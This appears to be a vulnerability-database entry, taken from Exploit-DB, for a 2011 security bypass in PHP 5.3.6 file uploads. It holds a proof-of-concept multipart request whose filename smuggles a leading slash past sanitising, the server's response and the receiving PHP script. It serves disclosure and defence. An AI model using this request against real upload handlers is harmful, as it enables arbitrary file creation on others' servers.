PHP Security Bypass Vulnerability

vendor:

PHP

by:

Unknown

7.5

CVSS

HIGH

Security Bypass

CWE

Product Name: PHP

Affected Version From: PHP 5.3.6

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:php:php:5.3.6

Metasploit:

Other Scripts:

Platforms Tested:

2011

PHP Security Bypass Vulnerability

The vulnerability allows an attacker to create arbitrary files from the root directory, which can aid in further attacks.

Mitigation:

Apply the latest security patches or upgrade to a non-vulnerable version of PHP.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48259/info

PHP is prone to a security-bypass vulnerability.

Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.

PHP 5.3.6 is vulnerable; other versions may also be affected.

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200

------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain

any
------------ThIs_Is_tHe_bouNdaRY_$--

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
<?php
if (!empty($_FILES['contents'])) {  // process file upload
    echo $_FILES['contents']['name'];
    unlink($_FILES['contents']['tmp_name']);
}